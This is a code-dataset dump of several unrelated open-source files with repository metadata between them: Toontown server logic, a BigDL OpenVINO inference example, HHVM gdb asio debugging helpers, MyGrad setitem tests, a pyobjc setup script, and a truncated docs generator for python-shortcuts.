"Short-sleeve shirt dress": 0.29,
"Sleeveless, scoop-neck shirt (thin)": 0.23,
"Sleeveless, scoop-neck shirt (thick)": 0.27,
"Long sleeve shirt (thin)": 0.25,
"Long sleeve shirt (thick)": 0.36,
"Single-breasted coat (thin)": 0.36,
"Single-breasted coat (thick)": 0.44,
"Double-breasted coat (thin)": 0.42,
"Double-breasted coat (thick)": 0.48,
}
#: This dictionary contains the reflection coefficients, Fr, for different special materials
f_r_garments = {
"Cotton with aluminium paint": 0.42,
"Viscose with glossy aluminium foil": 0.19,
"Aramid (Kevlar) with glossy aluminium foil": 0.14,
"Wool with glossy aluminium foil": 0.12,
"Cotton with glossy aluminium foil": 0.04,
"Viscose vacuum metallized with aluminium": 0.06,
"Aramid vacuum metallized with aluminium": 0.04,
"Wool vacuum metallized with aluminium": 0.05,
"Cotton vacuum metallized with aluminium": 0.05,
"Glass fiber vacuum metallized with aluminium": 0.07,
}
|
aae6f836f4e57fcc4ffa604eff70afc99414fd36
|
da1721d2783ea4d67ff4e73cee6eee71292f2ef7
|
/toontown/coghq/CogSuitManagerAI.py
|
37ca35b58eed5d8e03ae814e51c10b2d98d6f3d1
|
[
"BSD-3-Clause"
] |
permissive
|
open-toontown/open-toontown
|
bbdeb1b7bf0fb2861eba2df5483738c0112090ca
|
464c2d45f60551c31397bd03561582804e760b4a
|
refs/heads/develop
| 2023-07-07T01:34:31.959657
| 2023-05-30T23:49:10
| 2023-05-30T23:49:10
| 219,221,570
| 143
| 104
|
BSD-3-Clause
| 2023-09-11T09:52:34
| 2019-11-02T22:24:38
|
Python
|
UTF-8
|
Python
| false
| false
| 708
|
py
|
CogSuitManagerAI.py
|
from otp.ai.AIBaseGlobal import *
from direct.directnotify import DirectNotifyGlobal
import random
from toontown.suit import SuitDNA
from . import CogDisguiseGlobals
class CogSuitManagerAI:
notify = DirectNotifyGlobal.directNotify.newCategory('CogSuitManagerAI')
def __init__(self, air):
self.air = air
def recoverPart(self, av, factoryType, suitTrack, zoneId, avList):
partsRecovered = [
0, 0, 0, 0]
part = av.giveGenericCogPart(factoryType, suitTrack)
if part:
partsRecovered[CogDisguiseGlobals.dept2deptIndex(suitTrack)] = part
self.air.questManager.toonRecoveredCogSuitPart(av, zoneId, avList)
return partsRecovered
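# Illustrative note: the returned list has one slot per cog department, e.g.
# [0, part, 0, 0], with the non-zero index chosen by
# CogDisguiseGlobals.dept2deptIndex(suitTrack); an all-zero list means no part
# was awarded.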
|
ccc74d1f443f47c7f6325b76ce811786f347672c
|
f2034c76a11ce6296131d2bab89a5dae7d59edfe
|
/python/nano/tutorial/inference/openvino/openvino_inference_sync.py
|
24180c3f97ab776a2ae30ef5df7b7cbf75fdd38f
|
[
"Apache-2.0"
] |
permissive
|
intel-analytics/BigDL
|
e22cd917eecc7340bda3df4356acba0623a62ef6
|
4ffa012a426e0d16ed13b707b03d8787ddca6aa4
|
refs/heads/main
| 2023-08-22T06:31:37.923091
| 2023-08-22T02:58:42
| 2023-08-22T02:58:42
| 66,823,715
| 4,913
| 1,327
|
Apache-2.0
| 2023-09-14T10:41:50
| 2016-08-29T07:59:50
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,398
|
py
|
openvino_inference_sync.py
|
#
# Copyright 2016 The BigDL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Required Dependencies
# Install OpenVINO
# ```bash
# pip install openvino-dev
# ```
# Download model
# The following command is recommended to be executed in the same directory as this script
# ```bash
# omz_downloader --name resnet18-xnor-binary-onnx-0001 -o ./model
# ```
import numpy as np
if __name__ == "__main__":
# use resnet18 model pretrained on ImageNet dataset for example
model_path = "model/intel/resnet18-xnor-binary-onnx-0001/FP16-INT1/resnet18-xnor-binary-onnx-0001.xml"
# prepare input data
x = np.random.randn(1,3,224,224)
# inference using Nano
from bigdl.nano.openvino import OpenVINOModel
ov_model = OpenVINOModel(model=model_path)
y_hat = ov_model(x)
predictions = y_hat.argmax(axis=1)
print(predictions)
|
7b1a2bccb7e723b10b595b3b6386c84b20a466c4
|
308f5596f1c7d382520cfce13ceaa5dff6f4f783
|
/hphp/tools/gdb/asio.py
|
aa1fab6ff030067d50cef8785431fcf3cc474b62
|
[
"PHP-3.01",
"Zend-2.0",
"MIT"
] |
permissive
|
facebook/hhvm
|
7e200a309a1cad5304621b0516f781c689d07a13
|
d8203129dc7e7bf8639a2b99db596baad3d56b46
|
refs/heads/master
| 2023-09-04T04:44:12.892628
| 2023-09-04T00:43:05
| 2023-09-04T00:43:05
| 455,600
| 10,335
| 2,326
|
NOASSERTION
| 2023-09-14T21:24:04
| 2010-01-02T01:17:06
|
C++
|
UTF-8
|
Python
| false
| false
| 10,864
|
py
|
asio.py
|
#!/usr/bin/env python3
"""
GDB commands for asio information and stacktraces.
"""
from compatibility import *
import gdb
from itertools import count
import re
from gdbutils import *
from lookup import lookup_func_from_fp
import frame
import idx
from sizeof import sizeof
#------------------------------------------------------------------------------
# WaitHandle wrapper class.
class WaitHandle:
"""Wrapper class for a HHVM::c_Awaitable*."""
##
# gdb.Value delegation.
#
def __init__(self, wh):
if not isinstance(wh, gdb.Value):
raise TypeError('bad call to WaitHandle()')
if (
not str(deref(wh).type).endswith('WaitHandle')
and not str(deref(wh).type).endswith('Awaitable')
):
raise TypeError('non-WaitHandle[*] value passed to WaitHandle()')
self.wh = wh
wh_name = 'HPHP::c_' + self.kind_str() + 'WaitHandle'
self.wh = self.wh.cast(T(wh_name).pointer())
def __getitem__(self, idx):
return self.wh[idx]
def get(self):
return self.wh
##
# c_Awaitable* methods.
#
def kind(self):
kind_ty = T('HPHP::c_Awaitable::Kind')
return (self.wh['m_kind_state'] >> 4).cast(kind_ty)
def kind_str(self):
return str(self.kind())[len('HPHP::c_Awaitable::Kind::'):]
def state(self):
return (self.wh['m_kind_state'] & 0xf).cast(T('uint8_t'))
def state_str(self):
kind = self.kind_str()
state = self.state()
res = 'INVALID'
# Each WaitHandle has its own states...
if state == 0:
res = 'SUCCEEDED'
elif state == 1:
res = 'FAILED'
elif state == 2:
if kind == 'Sleep' or kind == 'ExternalThreadEvent':
res = 'WAITING'
elif kind == 'Reschedule':
res = 'SCHEDULED'
else:
res = 'BLOCKED'
elif state == 3 and kind == 'Resumable':
res = 'SCHEDULED'
elif state == 4 and kind == 'Resumable':
res = 'RUNNING'
return res
def finished(self):
return self.state() <= K('HPHP::c_Awaitable::STATE_FAILED')
def resumable(self):
resumable_ty = T('HPHP::Resumable')
if deref(self.wh).type == T('HPHP::c_AsyncFunctionWaitHandle'):
p = self.wh.cast(T('char').pointer()) - resumable_ty.sizeof
return p.cast(resumable_ty.pointer())
if deref(self.wh).type == T('HPHP::c_AsyncGeneratorWaitHandle'):
gen = self.wh['m_generator']
native_data_ty = T('HPHP::AsyncGenerator')
p = gen.cast(T('char').pointer()) - native_data_ty.sizeof
return p.cast(resumable_ty.pointer())
return None
def func(self):
resumable = self.resumable()
if resumable is None:
return None
return lookup_func_from_fp(resumable['m_actRec'])
##
# Parent chain.
#
def parent(self):
"""Same as wh->getParentChain().firstInContext(wh->getContextIdx())."""
ctx_idx = self.wh['m_contextIdx']
blockable = self.wh['m_parentChain']['m_lastParent']
result = None
while blockable != nullptr():
wh = WaitHandle.from_blockable(blockable)
if (
wh is not None
and not wh.finished()
and wh['m_contextIdx'] == ctx_idx
):
result = wh
ty = T('HPHP::AsioBlockable').pointer()
blockable = (blockable['m_bits'] & ~0x7).cast(ty)
return result
def chain(self):
"""Generate a WaitHandle's parent chain."""
wh = self
while wh is not None:
yield wh
wh = wh.parent()
##
# Static constructors.
#
@staticmethod
def from_blockable(blockable):
"""Get the containing WaitHandle of an AsioBlockable*."""
bits = blockable['m_bits']
kind_str = 'HPHP::AsioBlockable::Kind'
        # The low 3 bits encode the parent's kind; the remaining bits point to
        # the next blockable in the chain.
        kind = (bits & 0x7).cast(T(kind_str))
m = re.match(kind_str + r'::(\w+)WaitHandle\w*', str(kind))
if m is None:
return None
wh_name = m.group(1)
if wh_name == 'AsyncFunction':
offset = 48
elif wh_name == 'AsyncGenerator':
offset = 56
elif wh_name == 'AwaitAll':
offset = 48
elif wh_name == 'Condition':
offset = 48
else:
return None
wh_ptype = T('HPHP::c_' + wh_name + 'WaitHandle').pointer()
wh = (blockable.cast(T('char').pointer()) - offset).cast(wh_ptype)
try:
if blockable != wh['m_blockable'].address:
return None
        except Exception:
if blockable != wh['m_children'][0]['m_blockable'].address:
return None
return WaitHandle(wh)
    def to_string(self):
        desc = '%s @ %s' % (deref(self.wh).type, self.wh)
        func = self.func()
        if func is not None:
            desc = desc + (' (%s)' % (nameof(func)))
        return desc
#------------------------------------------------------------------------------
# Other ASIO helpers.
def asio_context(ctx_idx=None):
"""Get the AsioContext in the current thread by index."""
contexts = TL('HPHP::AsioSession::s_current')['m_p']['m_contexts']
top_idx = sizeof(contexts)
if ctx_idx is None:
ctx_idx = top_idx
if ctx_idx > top_idx:
return None
# AsioContexts are numbered from 1.
return idx.vector_at(contexts, ctx_idx - 1)
#------------------------------------------------------------------------------
# ASIO stacktraces.
def asio_stacktrace(wh, limit=None):
"""Produce a list of async frames by following a WaitHandle's parent chain.
The stacktrace ends at the WaitHandle::join().
The whole chain is walked even if `limit' is provided---the return
stacktrace will have `limit' or fewer entries if there were `limit' or
fewer frames, and `limit' + 1 frames otherwise, where the last frame is the
WaitHandle::join().
"""
stacktrace = []
count = 0
for wh in WaitHandle(wh).chain():
resumable = wh.resumable()
if resumable is None:
continue
if limit is None or count < limit:
stacktrace.append(frame.create_resumable(count, resumable))
count += 1
# FIXME: requires RDS lookup
#ar = asio_context(wh['m_contextIdx'])['m_savedFP']
ar = nullptr()
if ar != nullptr():
stacktrace.append(frame.create_php(idx=count, ar=ar))
return stacktrace
class AsyncStkCommand(gdb.Command):
"""Dump the async function stacktrace for a given WaitHandle.
The format used is the same as that used by `walkstk'.
"""
def __init__(self):
super(AsyncStkCommand, self).__init__('asyncstk', gdb.COMMAND_STACK)
@errorwrap
def invoke(self, args, from_tty):
try:
wh = gdb.parse_and_eval(args)
except gdb.error:
print('Usage: asyncstk wait-handle')
return
try:
stacktrace = asio_stacktrace(wh)
except TypeError:
print('asyncstk: Argument must be a WaitHandle object or pointer.')
return
for s in frame.stringify_stacktrace(stacktrace):
print(s)
AsyncStkCommand()
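# Hedged usage sketch: from a gdb session attached to an HHVM process, the
# command takes any expression that evaluates to a WaitHandle object or
# pointer (the address below is illustrative):
#
#   (gdb) asyncstk (HPHP::c_Awaitable*)0x7f00deadbeef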
#------------------------------------------------------------------------------
# `info asio' command.
class InfoAsioCommand(gdb.Command):
"""Metadata about the currently in-scope AsioContext"""
def __init__(self):
super(InfoAsioCommand, self).__init__('info asio', gdb.COMMAND_STATUS)
@errorwrap
def invoke(self, args, from_tty):
asio_session = TL('HPHP::AsioSession::s_current')['m_p']
contexts = asio_session['m_contexts']
num_contexts = sizeof(contexts)
if num_contexts == 0:
print('Not currently in the scope of an AsioContext')
return
asio_ctx = asio_context()
# Count the number of contexts, and print the topmost.
print('\n%d stacked AsioContext%s (current: (%s) %s)' % (
int(num_contexts),
plural_suffix(num_contexts),
str(asio_ctx.type),
str(asio_ctx)))
# Get the current vmfp().
header_ptype = T('HPHP::rds::Header').pointer()
vmfp = TL('HPHP::rds::tl_base').cast(header_ptype)['vmRegs']['fp'] # gdb.Value[HPHP::ActRec]
wh_ptype = T('HPHP::c_WaitableWaitHandle').pointer()
# Find the most recent join().
        for i, fp in izip(count(), frame.gen_php(vmfp)):
if nameof(lookup_func_from_fp(fp)) == r'HH\WaitHandle::join':
break
if nameof(lookup_func_from_fp(fp)) != r'HH\WaitHandle::join':
print("...but couldn't find join(). Something is wrong.\n")
return
wh = fp['m_this'].cast(wh_ptype)
print('\nCurrently %s WaitHandle: (%s) %s [state: %s]' % (
'joining' if i == 0 else 'executing',
str(wh.type),
str(wh),
WaitHandle(wh).state_str()))
# Dump the async stacktrace.
for s in frame.stringify_stacktrace(asio_stacktrace(wh)):
print(' %s' % s)
# Count the number of queued runnables.
queue_size = sizeof(asio_ctx['m_runnableQueue'])
print('%d other resumable%s queued' % (
int(queue_size),
plural_suffix(queue_size)))
sleeps = asio_ctx['m_sleepEvents']
externals = asio_ctx['m_externalThreadEvents']
num_sleeps = sizeof(sleeps)
num_externals = sizeof(externals)
# Count sleep and external thread events.
print('')
print('%d pending sleep event%s' % (
int(num_sleeps), plural_suffix(num_sleeps)))
print('%d pending external thread event%s' % (
int(num_externals), plural_suffix(num_externals)))
# Dump sleep and external thread event stacktraces.
for vec in [sleeps, externals]:
for i in xrange(int(sizeof(vec))):
wh = idx.vector_at(vec, i)
stacktrace = frame.stringify_stacktrace(asio_stacktrace(wh, 3))
print('\n(%s) %s [state: %s]' % (
str(wh.type), str(wh), WaitHandle(wh).state_str()))
if len(stacktrace) == 4:
for s in stacktrace[0:-1]:
print(' %s' % s)
print(' ...')
print(' %s' % stacktrace[-1])
else:
for s in stacktrace:
print(' %s' % s)
print('')
InfoAsioCommand()
|
5b32de04e8a62419416c294cac0e1787d22917cb
|
ca98f0332b773f9b1982118daf94ba75ffeaa90d
|
/tests/tensor_ops/test_setitem.py
|
8cb2ffa666032b402fa9605ad67d9ce3a129c236
|
[
"MIT"
] |
permissive
|
rsokl/MyGrad
|
f5b745b26a01ddda4ff6ce279746c47cb2f021cf
|
133072b526966e235d70bbfcf9eb86d43d0fcfa1
|
refs/heads/master
| 2023-07-09T01:20:42.314017
| 2023-07-03T19:13:30
| 2023-07-03T19:13:30
| 97,431,804
| 186
| 28
|
MIT
| 2023-07-03T19:13:32
| 2017-07-17T03:31:24
|
Python
|
UTF-8
|
Python
| false
| false
| 13,631
|
py
|
test_setitem.py
|
from typing import Callable
import hypothesis.extra.numpy as hnp
import hypothesis.strategies as st
import numpy as np
import pytest
from hypothesis import assume, given, note, settings
from numpy.testing import assert_allclose, assert_array_equal
import mygrad as mg
from mygrad._tensor_core_ops.indexing import (
_arr,
_is_bool_array_index,
_is_int_array_index,
)
from mygrad.tensor_base import Tensor
from ..custom_strategies import (
adv_integer_index,
arbitrary_indices,
basic_indices,
broadcastable_shapes,
tensors,
)
from ..utils.numerical_gradient import numerical_gradient_full
# test utilties used by setitem
def test_arr_util():
assert_array_equal(_arr(2, 2), np.arange(4).reshape(2, 2))
assert_array_equal(_arr(4, 3), np.arange(12).reshape(4, 3))
@given(tensors(elements=st.floats(-10, 10)))
def test_setitem_mutates_input(x: Tensor):
assume(x.size)
data_copy = np.array(x, copy=True)
data_view = np.asarray(x)
with mg.no_autodiff:
x[...] = 1 + x
assert np.all(x == data_view)
assert np.all(data_copy != data_view)
@pytest.mark.parametrize(
("arr", "truth"),
[
((0, 0), False),
((np.array([True]),), False),
((np.array([True]), [1]), True),
((np.array([True]), [1]), True),
((np.array([1]), [1]), True),
((np.array([True]), 1), False),
((np.array([True]), slice(None)), False),
],
)
def test_int_array_test(arr, truth):
assert _is_int_array_index(arr) is truth
@pytest.mark.parametrize(
("arr", "truth"),
[
((0, 0), False),
((np.array([True]),), True),
((np.array([True]), np.array([False])), False),
((np.array([1]), [1]), False),
((np.array([True]), 1), False),
((np.array([True]), slice(None)), False),
],
)
def test_bool_array_test(arr, truth):
assert _is_bool_array_index(arr) is truth
def setitem(x, y, index):
x_copy = np.copy(x)
x_copy[index] = y
return x_copy
class set_item_test_factory:
def __init__(
self,
array_strat: st.SearchStrategy[np.ndarray],
index_strat: Callable[[np.ndarray], st.SearchStrategy],
value_strat: Callable[[np.ndarray], st.SearchStrategy[np.ndarray]],
):
self.array_strat = array_strat
self.index_strat = index_strat
self.value_strat = value_strat
def __call__(self, f: Callable) -> Callable[[], None]:
"""Wraps an empty function to populate it with the test function"""
@given(x=self.array_strat, data=st.data())
def wrapper(x: np.ndarray, data: st.DataObject):
index = data.draw(self.index_strat(x), label="index")
try:
o = np.asarray(x[index])
except IndexError:
assume(False)
return
note(f"x[index]: {o}")
y = data.draw(self.value_strat(o), label="y")
numpy_x = np.copy(x)
numpy_y = np.copy(y)
mygrad_x = Tensor(np.copy(x))
mygrad_y = Tensor(np.copy(y))
mygrad_x1 = +mygrad_x
try:
numpy_x[index] = numpy_y # don't permit invalid set-items
except Exception:
assume(False)
return
grad = data.draw(
hnp.arrays(
shape=x.shape, dtype=float, elements=st.floats(1, 10), unique=True
),
label="grad",
)
mygrad_x1[index] = mygrad_y
out = (mygrad_x1 * grad).sum() # type: Tensor
out.backward()
assert_allclose(
mygrad_y.data,
numpy_y,
err_msg="After `x[index] = y`, tensor-y does not match numpy-y",
)
dx, dy = numerical_gradient_full(
setitem, x, y, back_grad=grad, kwargs=dict(index=index)
)
assert_allclose(
mygrad_x1.grad,
grad,
err_msg="After `x[index] = y`, x.grad does not match the expected numerical gradient",
)
assert_allclose(
mygrad_x.grad,
dx,
err_msg="After `x[index] = y`, x.grad does not match the expected numerical gradient",
)
assert_allclose(
mygrad_y.grad,
dy,
err_msg="After `x[index] = y`, y.grad does not match the expected numerical gradient",
)
assert not mygrad_y._ops
assert not mygrad_x._ops
assert not mygrad_x1._ops
return wrapper
def test_setitem_multiple_input():
"""
Ensures proper backprop through computational graph
in which variable that is set on serves as multiple
inputs to a single operation.
Ensures that clear-graph works properly.
"""
from mygrad import add_sequence
x = Tensor([1.0])
y = x + 0
assert_array_equal(y.data, np.array([1.0]))
o = add_sequence(y, y, y)
y[0] = 4
assert_array_equal(y.data, np.array([4.0]))
f = o * y # 3 * 4
f.backward()
assert_array_equal(o.data, np.array([3.0]))
assert_array_equal(f.data, np.array([12.0]))
assert_array_equal(x.grad, np.array([12.0]))
assert_array_equal(o.grad, np.array([4.0]))
assert_array_equal(y.grad, np.array([3.0]))
assert not x._ops
assert not y._ops
assert not o._ops
assert not f._ops
@given(x_constant=st.booleans(), y_constant=st.booleans(), data=st.data())
def test_setitem_sanity_check(x_constant, y_constant, data):
"""Ensure proper setitem behavior for all combinations of constant/variable Tensors"""
x = Tensor([1.0, 2.0, 3.0, 4.0], constant=x_constant)
w = 4 * x
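    # a variable y must be a Tensor; a constant y may also be a plain ndarray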
as_tensor = data.draw(st.booleans()) if y_constant else True
y = Tensor([1.0, 0.0], constant=y_constant) if as_tensor else np.array([1.0, 0.0])
w[::2] = np.array([-1.0, -2.0]) * y
assert_allclose(np.array((-1.0, 8.0, 0.0, 16.0)), w.data)
w.sum().backward()
assert isinstance(w, Tensor)
assert_allclose(w.data, np.array([-1.0, 8.0, 0.0, 16.0]))
if not w.constant:
assert w.grad is not None
assert_allclose(w.grad, np.ones_like(w.data))
assert w.constant is x.constant
    if x.constant:
        assert x.grad is None
else:
assert_allclose(x.grad, np.array([0.0, 4.0, 0.0, 4.0]))
if as_tensor:
if w.constant or y.constant:
assert y.grad is None
else:
assert_allclose(y.grad, np.array([-1.0, -2.0]))
    assert not w._ops, "clear-graph failed"
    assert not x._ops, "clear-graph failed"
if as_tensor:
assert not y._ops, "clear-graph failed"
def test_setitem_downstream_doesnt_affect_upstream_backprop():
"""Test that upstream computational graph is not affected by downstream set-item"""
x = Tensor([1.0, 2.0, 3.0, 4.0])
y = Tensor([-1.0, -2.0, -3.0, -4.0])
z = x * y
y[:] = 0
z.backward()
assert_allclose(np.ones_like(z.data), z.grad, err_msg=f"{type(z.grad)}")
assert_allclose(np.array([-1.0, -2.0, -3.0, -4.0]), x.grad)
assert_allclose(np.array([0.0, 0.0, 0.0, 0.0]), y.data)
assert y.grad is None
@pytest.mark.parametrize("x_constant", [True, False])
@pytest.mark.parametrize("y_constant", [True, False])
def test_setitem_doesnt_mutate_upstream_nodes(x_constant: bool, y_constant: bool):
"""Ensure setitem doesn't mutate variable non-constant tensor"""
x = Tensor([1.0, 2.0], constant=x_constant)
y = Tensor([3.0, 4.0], constant=y_constant)
z = x + y
y[:] = 0
y_old = z.creator.variables[-1] # version of y that participated in x + y
assert_allclose(np.array([3.0, 4.0]), y_old)
assert_allclose(np.array([0.0, 0.0]), y)
@settings(deadline=None, max_examples=1000)
@set_item_test_factory(
array_strat=hnp.arrays(
shape=hnp.array_shapes(min_side=0, max_side=4, min_dims=0, max_dims=5),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
index_strat=lambda x: basic_indices(x.shape),
value_strat=lambda o: (
hnp.arrays(
# Permit shapes that are broadcast-compatible with x[index]
# The only excess dimensions permitted in this shape are
# leading singletons
shape=broadcastable_shapes(o.shape).map(
lambda _x: tuple(
1 if (len(_x) - n) > o.ndim else s for n, s in enumerate(_x)
)
),
dtype=float,
elements=st.floats(-10.0, 10.0),
)
if o.shape and o.size
else st.floats(-10.0, 10.0).map(np.array)
),
)
def test_setitem_basic_index():
pass
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(
shape=hnp.array_shapes(max_side=4, max_dims=5),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
index_strat=lambda x: adv_integer_index(x.shape),
value_strat=lambda o: (
hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim, max_side=max(o.shape)),
dtype=float,
elements=st.floats(-10.0, 10.0),
)
if o.shape and o.size
else st.floats(-10.0, 10.0).map(np.asarray)
),
)
def test_setitem_adv_int_index():
pass
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(
shape=hnp.array_shapes(max_side=4, max_dims=5),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
index_strat=lambda x: hnp.arrays(shape=x.shape, dtype=bool),
value_strat=lambda o: (
hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim, max_side=max(o.shape)),
dtype=float,
elements=st.floats(-10.0, 10.0),
)
if o.shape and o.size
else st.floats(-10.0, 10.0).map(np.asarray)
),
)
def test_setitem_adv_bool_index():
pass
rows = np.array([0, 3], dtype=np.intp)
columns = np.array([0, 2], dtype=np.intp)
index = np.ix_(rows, columns)
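# np.ix_ builds an open-mesh index: `rows` and `columns` broadcast to select a 2x2 block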
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(shape=(4, 3), dtype=float, elements=st.floats(-10.0, 10.0)),
index_strat=lambda x: st.just(index),
value_strat=lambda o: hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
)
def test_setitem_broadcast_index():
pass
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(shape=(4, 3), dtype=float, elements=st.floats(-10.0, 10.0)),
index_strat=lambda x: st.just((slice(1, 2), [1, 2])),
value_strat=lambda o: hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
)
def test_setitem_mixed_index():
pass
rows2 = np.array([False, True, False, True])
columns2 = np.array([0, 2], dtype=np.intp)
index2 = (rows2, columns2)
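# index2 mixes a boolean mask along axis 0 with integer fancy-indexing along axis 1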
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(shape=(4, 3), dtype=float, elements=st.floats(-10.0, 10.0)),
index_strat=lambda x: st.just(index2),
value_strat=lambda o: hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
)
def test_setitem_broadcast_bool_index():
"""index mixes boolean and int-array indexing"""
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(shape=(4, 3), dtype=float, elements=st.floats(-10.0, 10.0)),
index_strat=lambda x: st.just(
(np.array([False, True, False, True]), np.newaxis, slice(None))
),
value_strat=lambda o: hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
)
def test_setitem_bool_basic_index():
"""index mixes boolean and basic indexing"""
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(shape=(3, 3), dtype=float, elements=st.floats(-10.0, 10.0)),
index_strat=lambda x: hnp.arrays(shape=(2, 3), dtype=bool).map(
lambda _x: (_x[0], _x[1])
),
value_strat=lambda o: hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim, max_side=max(o.shape)),
dtype=float,
elements=st.floats(-10.0, 10.0),
)
if o.shape and o.size
else st.floats(-10.0, 10.0).map(np.asarray),
)
def test_setitem_bool_axes_index():
"""index consists of boolean arrays specified for each axis"""
@settings(deadline=None, max_examples=1000)
@set_item_test_factory(
array_strat=hnp.arrays(
shape=hnp.array_shapes(min_side=0, max_side=4, min_dims=0, max_dims=5),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
index_strat=lambda x: arbitrary_indices(x.shape),
value_strat=lambda o: (
hnp.arrays(
# Permit shapes that are broadcast-compatible with x[index]
# The only excess dimensions permitted in this shape are
# leading singletons
shape=broadcastable_shapes(o.shape).map(
lambda _x: tuple(
1 if (len(_x) - n) > o.ndim else s for n, s in enumerate(_x)
)
),
dtype=float,
elements=st.floats(-10.0, 10.0),
)
if o.shape and o.size
else st.floats(-10.0, 10.0).map(np.array)
),
)
def test_setitem_arbitrary_index():
"""test arbitrary indices"""
|
08fe92f49972cbee2588fc5676ca295281440676
|
f80ef3a3cf859b13e8af8433af549b6b1043bf6e
|
/pyobjc-framework-SyncServices/setup.py
|
292225ff39d57b0dfa610d569ef6da1b7f829d6b
|
[
"MIT"
] |
permissive
|
ronaldoussoren/pyobjc
|
29dc9ca0af838a56105a9ddd62fb38ec415f0b86
|
77b98382e52818690449111cd2e23cd469b53cf5
|
refs/heads/master
| 2023-09-01T05:15:21.814504
| 2023-06-13T20:00:17
| 2023-06-13T20:00:17
| 243,933,900
| 439
| 49
| null | 2023-06-25T02:49:07
| 2020-02-29T08:43:12
|
Python
|
UTF-8
|
Python
| false
| false
| 1,563
|
py
|
setup.py
|
"""
Wrappers for the "SyncServices" framework on macOS.
Sync Services is a framework containing all the components you need
to sync your applications and devices. If your application uses
Sync Services, user data can be synced with other applications and
devices on the same computer, or other computers over the network via
MobileMe.
These wrappers don't include documentation. Please check Apple's
documentation for information on how to use this framework, and
PyObjC's documentation for general tips and tricks regarding the
translation between Python and (Objective-)C frameworks.
"""
import os
import sys
sys.path.insert(0, os.path.dirname(__file__))
from pyobjc_setup import Extension, setup # noqa: E402
VERSION = "9.2.1"
setup(
name="pyobjc-framework-SyncServices",
description="Wrappers for the framework SyncServices on macOS",
packages=["SyncServices"],
ext_modules=[
Extension(
"SyncServices._SyncServices",
["Modules/_SyncServices.m"],
extra_link_args=["-framework", "SyncServices"],
py_limited_api=True,
depends=[
os.path.join("Modules", fn)
for fn in os.listdir("Modules")
if fn.startswith("_SyncServices")
],
)
],
version=VERSION,
install_requires=[
"pyobjc-core>=" + VERSION,
"pyobjc-framework-Cocoa>=" + VERSION,
"pyobjc-framework-CoreData>=" + VERSION,
],
long_description=__doc__,
options={"bdist_wheel": {"py_limited_api": "cp36"}},
)
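A minimal post-install sanity check (a sketch, assuming the wheel built and installed cleanly):

# Importing the package loads the SyncServices Objective-C bridge.
import SyncServices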
|
8c8498ff8e5aef8971c41f41616dd455acbecb6f
|
bd2509c33e0336d21013e0cf20d6c1b3a40ac62f
|
/docs.py
|
87592fd78fdb7d20a07069f82c27459f3a668ab2
|
[
"MIT"
] |
permissive
|
alexander-akhmetov/python-shortcuts
|
ee12e7dbcfbdef7a4d5816fd2fdd3f9771b88120
|
41e8ea87a0058606052714b9755a4b4f47d3a276
|
refs/heads/master
| 2023-07-02T16:23:38.914324
| 2022-01-02T11:29:49
| 2022-01-02T11:29:49
| 150,023,351
| 660
| 39
|
MIT
| 2023-08-30T01:00:39
| 2018-09-23T20:35:50
|
Python
|
UTF-8
|
Python
| false
| false
| 2,520
|
py
|
docs.py
|
'''
Generates documentation for all available actions in the shortcuts.actions module
'''
import argparse
from shortcuts.actions import actions_registry
from shortcuts.actions.base import VariablesField
DOC_TEMPLATE = '''
# Supported Actions
This is a list of all actions supported by **python-shortcuts**.
Legend:
* *keyword*: the keyword you can use in `toml` files to describe the action
* *shortcuts identifier*: (*itype*) the identifier used to generate the action in a shortcut
System variables:
* `{{{{ask_when_run}}}}` - ask the user for an input when the shortcut is running.
----
{actions}
'''
def _build_docs():
    actions_docs = [_build_action_doc(a) for a in actions_registry.actions]
return DOC_TEMPLATE.format(actions='\n\n'.join(actions_docs))
ACTION_TEMPLATE = '''
### {name}
{doc}
**keyword**: `{keyword}`
**shortcuts identifier**: `{identifier}`
{params}
'''
def _build_action_doc(action):
params = '\n'.join([_build_params_doc(f) for f in action().fields]).strip()
params = f'params:\n\n{params}' if params else ''
doc = ''
if action.__doc__:
# remove spaces from the beginning of _each_ line
        doc = '\n'.join([line.strip() for line in action.__doc__.splitlines()])
return ACTION_TEMPLATE.format(
name=action.__name__,
doc=doc,
keyword=action.keyword,
identifier=action.itype,
params=params,
).strip()
PARAM_TEMPLATE = '* {name} {opts}'
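# e.g. renders to: "* text (*required*, *variables support*)"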
def _build_params_doc(field):
properties = ', '.join(_get_field_properties(field))
opts = f'({properties})'
choices = getattr(field, 'choices', None)
if choices:
opts += f' {field.help} | _choices_:\n'
opts += '\n'.join([f'\n * `{choice}`' for choice in choices])
return PARAM_TEMPLATE.format(
name=field._attr,
opts=opts,
).strip()
def _get_field_properties(field):
properties = []
if field.required:
properties.append('*required*')
if field.default:
properties.append(f'default={field.default}')
if isinstance(field, VariablesField):
properties.append('*variables support*')
return properties
def main():
